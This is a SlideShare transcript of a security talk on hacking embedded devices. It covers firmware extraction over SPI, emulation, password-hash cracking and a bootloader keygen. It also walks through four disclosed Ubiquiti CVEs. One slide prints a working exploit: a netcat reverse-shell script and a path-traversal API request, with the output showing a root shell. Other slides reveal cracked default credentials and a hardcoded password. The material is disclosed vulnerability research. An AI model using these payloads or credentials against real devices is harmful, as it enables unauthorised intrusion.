SlideShare a Scribd company logo

hacking-embedded-devices.pptx

Download as PPTX, PDF
S
ssuserfcf43f

The document summarizes Maycon Vitali's presentation on hacking embedded devices. It includes an agenda covering extracting firmware from devices using tools like BusPirate and flashrom, decompressing firmware to view file systems and binaries, emulating binaries using QEMU, reverse engineering code to find vulnerabilities, and details four vulnerabilities discovered in Ubiquiti networking devices designated as CVEs. The presentation aims to demonstrate common weaknesses in embedded device security and how tools can be used to analyze and hack these ubiquitous connected systems.

1 of 41
Internet of Sh*t Hacking Embedded Devices Maycon Vitali maycon at hacknroll dot com
Agenda • Who Am I? • General Overview • Toolset • Firmware Extraction • Serial Interface • Reverse Engineering • UBNT Findings – CVE-2017-093[2-5] • Conclusion
Who am I? • Senior Security Consultant @ SpiderLabs • Security Researcher @ Hack N’ Roll • Main duties: • Web Application Pentest • Network Pentest • Mobile Application Pentest (SL-TT) • ATM Pentest • Embedded Devices Pentest
General Overview
General Overview • Used by 64% of organizations • Present on almost 100% of all residents. • [g]old architecture designing. • Operating System with almost no protection (80s like exploitation) • Security isn’t a “MUST DO” to developers. • Common weaknesses.
Toolset
Main Toolset • Reversing • radare2 • Firmware Extraction (SPI) • SOIC Clip • BusPirate / Raspberry Pi • flashrom • Debugging • qemu-user • gdb (target arch) • gcc-multilib • gef
Firmware Extraction
Vendor Download Page
Network Sniffing Firmware Upgrade
SPI Extraction
SPI Extraction
Target ZHAL> ATSH FW Version : V1.13(WUK.0)b6 External Version : BR_SO_V1.13(WUK.0)b6 Bootbase Version : V1.10 | 01/18/2016 Vendor Name : MitraStar Technology Corp. Product Model : DSL-100HN-T1-NV Serial Number : ACC6629493C0 First MAC Address : ACC6629493C0 Last MAC Address : ACC6629493C3 MAC Address Quantity : 04 Default Country Code : D0 Boot Module Debug Flag : 00 Kernel Checksum : d831a525 RootFS Checksum : a4b2b045 RomFile Checksum : daa5645d Main Feature Bits : 00
SPI Pinout • CS – Chip Select • SI – Serial In • SO – Serial Out • SCLK - Clock • RESET# - Reset (not used) • VCC – Power-supply • GND - Ground MX25L12835F Datasheet
BusPirate
Using flashrom [maycon@DayOfDevil ~]$ flashrom > -p buspirate_spi:dev=/dev/buspirate,spispeed=1M > -c "MX25L12835F/MX25L12845E/MX25L12865E" > -r flash.dump flashrom v0.9.9-r1955 on Linux 4.14.7-1-ARCH (x86_64) flashrom is free software, get the code at https://flashrom.org Calibrating delay loop... OK. Found Macronix flash chip "MX25L12835F/MX25L12845E/MX25L12865E" (16384 kB, SPI) on buspirate_spi Reading flash... done
Using binwalk • -e means [e]xtrac files [maycon@DayOfDevil ~]$ binwalk –e flash.dump DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 26112 0x6600 LZMA compressed data, properties: 0x5D, ... 69600 0x10FE0 LZMA compressed data, properties: 0x5D, ... 197120 0x30200 LZMA compressed data, properties: 0x5D, ... 1372293 0x14F085 Squashfs filesystem, little endian, version 4.0, ... 8389120 0x800200 LZMA compressed data, properties: 0x5D, ... 9564293 0x91F085 Squashfs filesystem, little endian, version 4.0, ...
Binary Emulation [maycon@DayOfDevil squashfs-root]$ file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ cp $(which qemu-mips-static) . [maycon@DayOfDevil squashfs-root]$ ls -la qemu-mips-static -rwxr-xr-x 1 maycon users 3289936 Feb 19 03:47 qemu-mips-static [maycon@DayOfDevil squashfs-root]$ sudo chroot . ./qemu-mips-static bin/ls bin etc proc sys usr boaroot lib qemu-mips-static tmp var dev linuxrc sbin userfs
Serial Interface UART
UART Interface
hacking-embedded-devices.pptx
hacking-embedded-devices.pptx
Reverse Engineering
Reverse Engineering # cat > /etc/passwd support:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/cmdsh admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/sh $ ./john ./_flash.dump.extracted/squashfs-root/usr/etc/passwd Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 1234 (admin) 1g 0:00:00:00 DONE 2/3 (2017-12-21 20:46) 4.545g/s 24818p/s 24818c/s 24818C/s 123456..larry Use the "--show" option to display all of the cracked passwords reliably Session completed
hacking-embedded-devices.pptx
Reverse Engineering
Reverse Engineering • puts(“Password incorrect !”);
Reverse Engineering • puts(“Password incorrect !”); • system(…)
Reverse Engineering • puts(“Password incorrect !”); • system(…) • strcmp(…, “18vudl1b.4”);
hacking-embedded-devices.pptx
Bootloader ATEN Keygen
Reversing the ATEN algorithm [maycon@DayOfDevil Vivo]$ ./aten_bypass C6629493C0 To enable DebugFlag: ZHAL> ATEN 1,10F0A563 To disable DebugFlag: ZHAL> ATEN 0,10F0A563
hacking-embedded-devices.pptx
UBNT Findings
CVE-2017-0935 – Privilege Escalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config operator@ubnt:~$
CVE-2017-0935 – Privilege Escalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config unionfs 124.5M 0 124.5M 0% /opt/vyatta/config/tmp/new_config_g73ik18gms70ciap15in0mttpt0vk81b operator@ubnt:~$
CVE-2017-0934 – Privilege Escalation with Session Hijacking total 0 drwxrwxrwt 4 root root 300 Jan 1 00:07 . drwxr-xr-x 31 root root 760 Jan 1 00:00 .. srwxr-x--- 1 root root 0 Jan 1 00:00 .imi_line srw-rw---- 1 root root 0 Jan 1 00:00 .imi_show srw-rw---- 1 root root 0 Jan 1 00:00 .nsm_show srwxr-x--- 1 root root 0 Jan 1 00:00 .nsmserv srwxr-x--- 1 root root 0 Jan 1 00:00 .rib_serv srw-rw---- 1 root root 0 Jan 1 00:00 .rib_show drwxrwxr-x 2 root vyattacf 60 Jan 1 00:07 changes_only_9ckaihkfskhjt4q7t7d52c87tfvnbioi drwxr-x--- 2 root root 40 Jan 1 00:00 ifp srwxrwx--- 1 root vyattacf 0 Jan 1 00:00 ubnt.socket.cfgd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.cli srw-rw---- 1 root users 0 Jan 1 00:00 ubnt.socket.platd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.statsd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.sysd
CVE-2017-0933 – CSRF Bypassing “Referer:” Whitelisting Protection $ ls -la fake_www/ total 16 drwxr-xr-x 2 hnrteam users 4096 jun 15 02:08 . drwxr-xr-x 7 hnrteam users 4096 jun 15 02:03 .. -rw-r--r-- 1 hnrteam users 3847 jun 15 02:05 index.html -rw-r--r-- 1 hnrteam users 232 jun 15 02:03 lighttpd.conf server.document-root = "/home/operator/fake_www" server.port = 3000 mimetype.assign = ( ".html" => "text/html", ) index-file.names = ( "index.html" ) The content of lighttpd.conf file:
CVE-2017-0932 - Privilege Escalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}}
CVE-2017-0932 - Privilege Escalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}} $ nc -lvp 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from 192.168.2.1 44440 received! id uid=0(root) gid=102(vyattacfg) uname -a Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
Questions?

More Related Content

Similar to hacking-embedded-devices.pptx

Linux Kernel Crashdump
Linux Kernel CrashdumpLinux Kernel Crashdump
Linux Kernel Crashdump
Marian Marinov
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
Prathan Phongthiproek
 
Using Libtracecmd to Analyze Your Latency and Performance Troubles
Using Libtracecmd to Analyze Your Latency and Performance TroublesUsing Libtracecmd to Analyze Your Latency and Performance Troubles
Using Libtracecmd to Analyze Your Latency and Performance Troubles
ScyllaDB
 
Backups
BackupsBackups
Backups
Svet Ivantchev
 
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringOSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
NETWAYS
 
SiteGround Tech TeamBuilding
SiteGround Tech TeamBuildingSiteGround Tech TeamBuilding
SiteGround Tech TeamBuilding
Marian Marinov
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
Jose Palanco
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
yang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
yang bingwu
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
Prathan Phongthiproek
 
RING 0/-2 ROOKITS : COMPROMISING DEFENSES
RING 0/-2 ROOKITS : COMPROMISING DEFENSES RING 0/-2 ROOKITS : COMPROMISING DEFENSES
RING 0/-2 ROOKITS : COMPROMISING DEFENSES
Priyanka Aash
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
維泰 蔡
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptx
ssuserb4d806
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysis
Anne Nicolas
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardening
archwisp
 
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USARing 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
Alexandre Borges
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
Linaro
 
LISA2019 Linux Systems Performance
LISA2019 Linux Systems PerformanceLISA2019 Linux Systems Performance
LISA2019 Linux Systems Performance
Brendan Gregg
 
test
testtest
test
WentingLiu4
 
Percona Live UK 2014 Part III
Percona Live UK 2014 Part IIIPercona Live UK 2014 Part III
Percona Live UK 2014 Part III
Alkin Tezuysal
 

Similar to hacking-embedded-devices.pptx (20)

Linux Kernel Crashdump
Linux Kernel CrashdumpLinux Kernel Crashdump
Linux Kernel Crashdump
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
 
Using Libtracecmd to Analyze Your Latency and Performance Troubles
Using Libtracecmd to Analyze Your Latency and Performance TroublesUsing Libtracecmd to Analyze Your Latency and Performance Troubles
Using Libtracecmd to Analyze Your Latency and Performance Troubles
 
Backups
BackupsBackups
Backups
 
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringOSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
 
SiteGround Tech TeamBuilding
SiteGround Tech TeamBuildingSiteGround Tech TeamBuilding
SiteGround Tech TeamBuilding
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
RING 0/-2 ROOKITS : COMPROMISING DEFENSES
RING 0/-2 ROOKITS : COMPROMISING DEFENSES RING 0/-2 ROOKITS : COMPROMISING DEFENSES
RING 0/-2 ROOKITS : COMPROMISING DEFENSES
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptx
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysis
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardening
 
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USARing 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
 
LISA2019 Linux Systems Performance
LISA2019 Linux Systems PerformanceLISA2019 Linux Systems Performance
LISA2019 Linux Systems Performance
 
test
testtest
test
 
Percona Live UK 2014 Part III
Percona Live UK 2014 Part IIIPercona Live UK 2014 Part III
Percona Live UK 2014 Part III
 

Recently uploaded

UiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs ConferenceUiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs Conference
UiPathCommunity
 
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyyActive Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
RaminGhanbari2
 
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALLBLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
Liveplex
 
How RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptxHow RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptx
SynapseIndia
 
find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
huseindihon
 
Coordinate Systems in FME 101 - Webinar Slides
Coordinate Systems in FME 101 - Webinar SlidesCoordinate Systems in FME 101 - Webinar Slides
Coordinate Systems in FME 101 - Webinar Slides
Safe Software
 
Best Programming Language for Civil Engineers
Best Programming Language for Civil EngineersBest Programming Language for Civil Engineers
Best Programming Language for Civil Engineers
Awais Yaseen
 
How Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdfHow Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdf
HackersList
 
Manual | Product | Research Presentation
Manual | Product | Research PresentationManual | Product | Research Presentation
Manual | Product | Research Presentation
welrejdoall
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
Stephanie Beckett
 
What's New in Copilot for Microsoft365 May 2024.pptx
What's New in Copilot for Microsoft365 May 2024.pptxWhat's New in Copilot for Microsoft365 May 2024.pptx
What's New in Copilot for Microsoft365 May 2024.pptx
Stephanie Beckett
 
How to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptxHow to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptx
Adam Dunkels
 
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly DetectionAdvanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Bert Blevins
 
Quality Patents: Patents That Stand the Test of Time
Quality Patents: Patents That Stand the Test of TimeQuality Patents: Patents That Stand the Test of Time
Quality Patents: Patents That Stand the Test of Time
Aurora Consulting
 
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Chris Swan
 
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxRPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
SynapseIndia
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
Yevgen Sysoyev
 
Implementations of Fused Deposition Modeling in real world
Implementations of Fused Deposition Modeling in real worldImplementations of Fused Deposition Modeling in real world
Implementations of Fused Deposition Modeling in real world
Emerging Tech
 
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Erasmo Purificato
 
20240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 202420240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 2024
Matthew Sinclair
 

Recently uploaded (20)

UiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs ConferenceUiPath Community Day Kraków: Devs4Devs Conference
UiPath Community Day Kraków: Devs4Devs Conference
 
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyyActive Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
 
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALLBLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
 
How RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptxHow RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptx
 
find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
 
Coordinate Systems in FME 101 - Webinar Slides
Coordinate Systems in FME 101 - Webinar SlidesCoordinate Systems in FME 101 - Webinar Slides
Coordinate Systems in FME 101 - Webinar Slides
 
Best Programming Language for Civil Engineers
Best Programming Language for Civil EngineersBest Programming Language for Civil Engineers
Best Programming Language for Civil Engineers
 
How Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdfHow Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdf
 
Manual | Product | Research Presentation
Manual | Product | Research PresentationManual | Product | Research Presentation
Manual | Product | Research Presentation
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
 
What's New in Copilot for Microsoft365 May 2024.pptx
What's New in Copilot for Microsoft365 May 2024.pptxWhat's New in Copilot for Microsoft365 May 2024.pptx
What's New in Copilot for Microsoft365 May 2024.pptx
 
How to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptxHow to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptx
 
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly DetectionAdvanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
 
Quality Patents: Patents That Stand the Test of Time
Quality Patents: Patents That Stand the Test of TimeQuality Patents: Patents That Stand the Test of Time
Quality Patents: Patents That Stand the Test of Time
 
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
 
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxRPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
 
Implementations of Fused Deposition Modeling in real world
Implementations of Fused Deposition Modeling in real worldImplementations of Fused Deposition Modeling in real world
Implementations of Fused Deposition Modeling in real world
 
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
 
20240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 202420240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 2024
 

hacking-embedded-devices.pptx

  • 1. Internet of Sh*t Hacking Embedded Devices Maycon Vitali maycon at hacknroll dot com
  • 2. Agenda • Who Am I? • General Overview • Toolset • Firmware Extraction • Serial Interface • Reverse Engineering • UBNT Findings – CVE-2017-093[2-5] • Conclusion
  • 3. Who am I? • Senior Security Consultant @ SpiderLabs • Security Researcher @ Hack N’ Roll • Main duties: • Web Application Pentest • Network Pentest • Mobile Application Pentest (SL-TT) • ATM Pentest • Embedded Devices Pentest
  • 5. General Overview • Used by 64% of organizations • Present on almost 100% of all residents. • [g]old architecture designing. • Operating System with almost no protection (80s like exploitation) • Security isn’t a “MUST DO” to developers. • Common weaknesses.
  • 7. Main Toolset • Reversing • radare2 • Firmware Extraction (SPI) • SOIC Clip • BusPirate / Raspberry Pi • flashrom • Debugging • qemu-user • gdb (target arch) • gcc-multilib • gef
  • 13. Target ZHAL> ATSH FW Version : V1.13(WUK.0)b6 External Version : BR_SO_V1.13(WUK.0)b6 Bootbase Version : V1.10 | 01/18/2016 Vendor Name : MitraStar Technology Corp. Product Model : DSL-100HN-T1-NV Serial Number : ACC6629493C0 First MAC Address : ACC6629493C0 Last MAC Address : ACC6629493C3 MAC Address Quantity : 04 Default Country Code : D0 Boot Module Debug Flag : 00 Kernel Checksum : d831a525 RootFS Checksum : a4b2b045 RomFile Checksum : daa5645d Main Feature Bits : 00
  • 14. SPI Pinout • CS – Chip Select • SI – Serial In • SO – Serial Out • SCLK - Clock • RESET# - Reset (not used) • VCC – Power-supply • GND - Ground MX25L12835F Datasheet
  • 16. Using flashrom [maycon@DayOfDevil ~]$ flashrom > -p buspirate_spi:dev=/dev/buspirate,spispeed=1M > -c "MX25L12835F/MX25L12845E/MX25L12865E" > -r flash.dump flashrom v0.9.9-r1955 on Linux 4.14.7-1-ARCH (x86_64) flashrom is free software, get the code at https://flashrom.org Calibrating delay loop... OK. Found Macronix flash chip "MX25L12835F/MX25L12845E/MX25L12865E" (16384 kB, SPI) on buspirate_spi Reading flash... done
  • 17. Using binwalk • -e means [e]xtrac files [maycon@DayOfDevil ~]$ binwalk –e flash.dump DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 26112 0x6600 LZMA compressed data, properties: 0x5D, ... 69600 0x10FE0 LZMA compressed data, properties: 0x5D, ... 197120 0x30200 LZMA compressed data, properties: 0x5D, ... 1372293 0x14F085 Squashfs filesystem, little endian, version 4.0, ... 8389120 0x800200 LZMA compressed data, properties: 0x5D, ... 9564293 0x91F085 Squashfs filesystem, little endian, version 4.0, ...
  • 18. Binary Emulation [maycon@DayOfDevil squashfs-root]$ file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ cp $(which qemu-mips-static) . [maycon@DayOfDevil squashfs-root]$ ls -la qemu-mips-static -rwxr-xr-x 1 maycon users 3289936 Feb 19 03:47 qemu-mips-static [maycon@DayOfDevil squashfs-root]$ sudo chroot . ./qemu-mips-static bin/ls bin etc proc sys usr boaroot lib qemu-mips-static tmp var dev linuxrc sbin userfs
  • 24. Reverse Engineering # cat > /etc/passwd support:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/cmdsh admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/sh $ ./john ./_flash.dump.extracted/squashfs-root/usr/etc/passwd Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 1234 (admin) 1g 0:00:00:00 DONE 2/3 (2017-12-21 20:46) 4.545g/s 24818p/s 24818c/s 24818C/s 123456..larry Use the "--show" option to display all of the cracked passwords reliably Session completed
  • 29. Reverse Engineering • puts(“Password incorrect !”); • system(…) • strcmp(…, “18vudl1b.4”);
  • 32. Reversing the ATEN algorithm [maycon@DayOfDevil Vivo]$ ./aten_bypass C6629493C0 To enable DebugFlag: ZHAL> ATEN 1,10F0A563 To disable DebugFlag: ZHAL> ATEN 0,10F0A563
  • 35. CVE-2017-0935 – Privilege Escalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config operator@ubnt:~$
